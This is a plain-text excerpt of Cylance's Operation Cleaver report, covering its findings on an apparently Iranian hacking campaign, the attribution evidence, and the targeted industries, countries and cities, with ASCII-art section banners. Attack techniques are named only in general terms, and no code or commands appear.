  387. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  388. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  389. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  390. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  391. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  392. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  393. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  394. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  395. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  396. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  397. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  398. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  399. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  400. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  401. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  402. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  403. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  404. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  405. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  406. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  407. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  408. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  409. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
  410.  
  411. [ PG-9  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  412.  
  413.  
  414.  
  415. [CYLANCE                                                                                  #OPCLEAVER]
  416.  
  417. CRITICAL  DISCOVERIES
  418.  
  419. Iranian Actors Are Behind Operation Cleaver
  420.  
  421. *       Persian hacker names are used throughout the campaign including: Salman Ghazikhani,
  422.         Bahman Mohebbi, Kaj, Parviz, Alireza, and numerous others.
  423. *       Numerous domains used in the campaign were registered in Iran.
  424. *       Infrastructure leveraged in the attack was registered in Iran to the corporate entity
  425.         Tarh Andishan, which translates to “invention” or “innovation” in Farsi.
  426. *       Source netblocks and ASNs are registered to Iran.
  427. *       Hacker tools warn when their external IP address traces back to Iran.
  428. *       The infrastructure is hosted through Netafraz.com, an Iranian provider out of Isfahan, Iran.
  429. *       The infrastructure utilized in the campaign is too significant to be a lone individual or a small
  430.         group. We believe this work was sponsored by Iran.
  431.  
  432.  
  433. Operation Cleaver Targets Critical Infrastructure Around the World
  434.  
  435. *       US Military targets including NMCI in October 2013.5 Confirmed targeting of global government
  436.         entities.
  437. *       Networks and systems targeted in critical industries like energy and utilities, oil and gas,
  438.         and chemical companies.
  439. *       Assets (both cyber and physical) and logistics information were compromised at major airline
  440.         operators, airports, and transportation companies.
  441. *       Various global telecommunications, technology, healthcare, aerospace, and defense companies
  442.         were breached as part of the operation.
  443. *       Confidential critical infrastructure documents were harvested from major educational
  444.         institutions around the world.
  445.  
  446. Iran’s Cyber Hacking Skills Have Evolved
  447.  
  448. *       Initial compromise techniques include SQL injection, web attacks, and creative deception-based
  449.         attacks – all of which have been implemented in the past by Chinese and Russian hacking teams.
  450. *       Pivoting and exploitation techniques leveraged existing public exploits for MS08-067 and Windows
  451.         privilege escalations, and were coupled with automated, worm-like propagation mechanisms.
  452. *       Customized private tools with functions that include ARP poisoning, encryption, credential
  453.         dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB
  454.         communications, network interface sniffing, and keystroke logging.
  455. *       The ability to build customized tools to compromise any target they choose.
  456.  
  457. [ PG-10 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  458.  
  459.  
  460.  
  461. [CYLANCE                                                                                  #OPCLEAVER]
  462.  
  463. Indicators of Compromise (IOC)
  464.  
  465. *       Private signing certificates of one victim were captured allowing the Operation Cleaver team to
  466.         compromise the entirety of their organization.
  467. *       Over the past two years, Cylance has collected over 8GB of data including over 80,000 files of
  468.         exfiltrated data, hacker tools, victim logs, and highly sensitive reconnaissance data.
  469. *       Data from sinkholed command and control servers has allowed us to track this active campaign.
  470. *       Cylance is releasing more than 150 IOCs and samples associated with the Cleaver campaign to
  471.         empower the security community to detect existing compromises in their own organizations,
  472.         as well as potentially block future attacks from these teams.
  473.  
  474. Speculation
  475.  
  476. *       This campaign continues Iran’s retaliation for Stuxnet, Duqu, and Flame.
  477. *       This is a state-sponsored campaign.
  478. *       There is a possibility that this campaign could affect airline passenger safety.
  479. *       This campaign’s intentions may be to damage Industrial Control Systems (ICS), Supervisory Control
  480.         and Data Acquisition (SCADA) systems, and impact Critical Infrastructure and Key Resources (CIKR).
  481. *       This campaign could be a way to demonstrate Iran’s cyber capabilities for additional geopolitical
  482.         leverage, due to the breadth and depth of their global targets.
  483. *       There is an intense focus on CIKR companies in South Korea, which could give Iran additional clout
  484.         in their burgeoning partnership with North Korea. In September 2012, Iran signed an extensive
  485.         agreement for technology cooperation agreement with North Korea, which would allow for
  486.         collaboration on various efforts including IT and security.6
  487. *       Iran is recruiting from within the universities and potentially using ‘hackers for hire’.7
  488.  
  489. [ PG-11 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  490.  
  491.  
  492.  
  493. [CYLANCE                                                                                  #OPCLEAVER]
  494. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  495. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  496. %#%%%%%%%%@@@%%%@@#%%%%%%%%         TARGETS & VICTIMS        @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
  497. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
  498. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  499. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  500. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  501. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  502. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  503. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  504. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  505. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
  506. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
  507. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
  508. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
  509. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
  510. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
  511. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
  512. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
  513. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  514. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  515. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
  516. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  517. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  518. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  519. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  520. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  521. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  522. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  523. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  524. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  525. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  526. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  527. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  528. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  529. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  530. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  531. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  532. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  533. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  534. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  535. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  536. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  537. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  538. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  539. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  540. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  541. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  542. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  543. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  544. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  545. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  546. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  547. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  548. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  549. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  550. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  551. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  552. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  553. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  554. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
  555. [ PG-12 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  556.  
  557.  
  558.  
  559. [CYLANCE                                                                                  #OPCLEAVER]
  560.  
  561. TARGETS & VICTIMS
  562.  
  563. The Cleaver team targets some of the most sensitive global critical infrastructure companies in the
  564. world, including military, oil and gas, airlines, airports, energy producers, utilities,
  565. transportation, healthcare, telecommunications, technology, manufacturing, education, aerospace,
  566. Defense Industrial Base (DIB), chemical companies and governments. Countries impacted include
  567. Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar,
  568. Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the US.
  569.  
  570. The following is a breakdown by country of which industries were targeted and/or victimized:
  571.  
  572. Canada                                  Kuwait                                  South Korea
  573. -Energy & Utilities                     -Oil & Gas                              -Airports
  574. -Oil & Gas                              -Telecommunications                     -Airlines
  575. -Hospitals                                                                      -Education
  576.                                         Mexico                                  -Technology
  577. China                                   -Oil & Gas                              -Heavy Manufacturing
  578. -Aerospace
  579.                                         Pakistan                                Turkey
  580.                                         -Airports                               -Oil & Gas
  581. England                                 -Hospitals
  582. -Education                              -Technology
  583.                                         -Airlines                               United Arab Emirates
  584.                                                                                 -Government
  585. France                                                                          -Airlines
  586. -Oil & Gas                              Qatar
  587.                                         -Oil & Gas
  588.                                         -Government
  589. Germany                                 -Airlines
  590. -Telecommunications                                                             United States
  591.                                                                                 -Airlines
  592. India                                                                           -Education
  593. -Education                              Saudi Arabia                            -Chemicals
  594.                                         -Oil & Gas                              -Transportation
  595. Israel                                  -Airports                               -Energy & Utilities
  596. -Aerospace                                                                      -Military/Government
  597. -Education                                                                      -Defense Industrial Base
  598.  
  599. [ PG-13 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  600.  
  601.  
  602.  
  603. [CYLANCE                                                                                  #OPCLEAVER]
  604.  
  605. Cleaver’s level of access into each organization varied greatly, including completely compromised
  606. systems and networks, Active Directory domain controllers and credentials, compromised data
  607. repositories and stolen VPN credentials.
  608.  
  609. Compromised systems include Microsoft Windows web servers running IIS and ColdFusion, Apache with PHP,
  610. many variants of Microsoft Windows desktops and servers, and Linux servers. Compromised network
  611. infrastructure included Cisco VPNs as well as Cisco switches and routers. Unlike Stuxnet, no exotic
  612. exploitations (such as 0-days) were observed.
  613.  
  614. Within our investigation, we had no direct evidence of a successful compromise of specific Industrial
  615. Control Systems (ICS) or Supervisory Control and Data Acquisition (SCADA) networks, but Cleaver did
  616. exfiltrate extremely sensitive data from many critical infrastructure companies allowing them to
  617. directly affect the systems they run. This data could enable them, or affiliated organizations, to
  618. target and potentially sabotage ICS and SCADA environments with ease.
  619.  
  620. We discovered over 50 victims in our investigation, distributed around the globe. Ten of these victims
  621. are headquartered in the US and include a major airline, a medical university, an energy company
  622. specializing in natural gas production, an automobile manufacturer, a large defense contractor, and a
  623. major military installation. The four targets in Israel and the five targets in Pakistan are comprised
  624. of education, aerospace, airports, airlines, healthcare and technology. Further victims were identified
  625. in numerous Middle Eastern countries as well as ones in Northern Europe including the UK, France, and
  626. Germany. Central America was not immune either with a large oil and gas company on the list. In fact,
  627. oil and gas was a particular focal point for the Cleaver team, going after no less than nine of these
  628. companies around the world.
  629.  
  630. Universities were targeted in the US, India, Israel, and South Korea. The attackers targeted research
  631. efforts, student information, student housing, and financial aid systems. They had a penchant for
  632. pictures, passports, and any specifc identifying information.
  633.  
  634. Perhaps the most bone-chilling evidence we collected in this campaign was the targeting and compromise
  635. of transportation networks and systems such as airlines and airports in South Korea, Saudi Arabia and
  636. Pakistan. The level of access seemed ubiquitous: Active Directory domains were fully compromised,
  637. along with entire Cisco Edge switches, routers, and internal networking infrastructure. Fully
  638. compromised VPN credentials meant their entire remote access infrastructure and supply chain was under
  639. the control of the Cleaver team, allowing permanent persistence under compromised credentials.
  640. They achieved complete access to airport gates and their security control systems, potentially
  641. allowing them to spoof gate credentials. They gained access to PayPal and Go Daddy credentials allowing
  642. them to make fraudulent purchases and allowed unfettered access to the victim’s domains. We were
  643. witnessed a shocking amount of access into the deepest parts of these companies and the airports in
  644. which they operate.
  645.  
  646. [ PG-14 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  647.  
  648.  
  649.  
  650. [CYLANCE                                                                                  #OPCLEAVER]
  651.  
  652. TARGET LOCATIONS
  653.  
  654.  
  655. 1.Canada - Calgary              13.Mexico - Mexico City         25.UAE - Abu Dhabi
  656. 2.Canada - Hamilton             14.Pakistan - Karachi (2)       26.UAE - Al Garhoud
  657. 3.China - Beijing               15.Pakistan - Lahore            27.USA - California - Los Angeles(2)
  658. 4.England - Oxford              16.Pakistan - Multan            28.USA - California - San Diego
  659. 5.France - Paris                17.Pakistan - Peshawar          29.USA - California - San Jose
  660. 6.Germany - Dusseldorf          18.Qatar - Doha (4)             30.USA - Michigan - Dearborn
  661. 7.Germany - Frankfurt           19.Saudi Arabia - Dhahran       31.USA - Texas  - Houston (2)
  662. 8.India - New Delhi (2)         20.Saudi Arabia - Jeddah                32.USA - Texas  - Fort Worth
  663. 9.Israel - Haifa (3)            21.South Korea - Incheon                33.USA - Texas  - Southlake
  664. 10.Israel - Rehovot             22.South Korea - Goyang-si      34.USA - Virginia - Fairfax
  665. 11.Kuwait - Ahmadi              23.South Korea - Seoul (7)      35.USA - Virginia - McLean
  666. 12.Kuwait - Kuwait City         24.Turkey - Antalya
  667.  
  668. [ PG-15 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  669.  
  670.  
  671.  
  672. [CYLANCE                                                                                  #OPCLEAVER]
  673.  
  674. [PRETTY CHART]
  675.  
  676. Figure 2: Geographic distribution of victims, as determined by the global headquarters of the parent
  677. company or organization breached.
  678.  
  679.  
  680. [ PG-16 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  681.  
  682.  
  683.  
  684. [CYLANCE                                                                                  #OPCLEAVER]
  685.  
  686. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  687. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  688. %#%%%%%%%%@@@%%%@@#%%%%%%%%             ATTRIBUTION          @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
  689. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
  690. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  691. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  692. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  693. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  694. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  695. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  696. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  697. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
  698. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
  699. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
  700. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
  701. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
  702. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
  703. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
  704. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
  705. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  706. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  707. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
  708. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  709. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  710. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  711. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  712. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  713. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  714. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  715. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  716. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  717. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  718. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  719. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  720. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  721. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  722. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  723. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  724. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  725. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
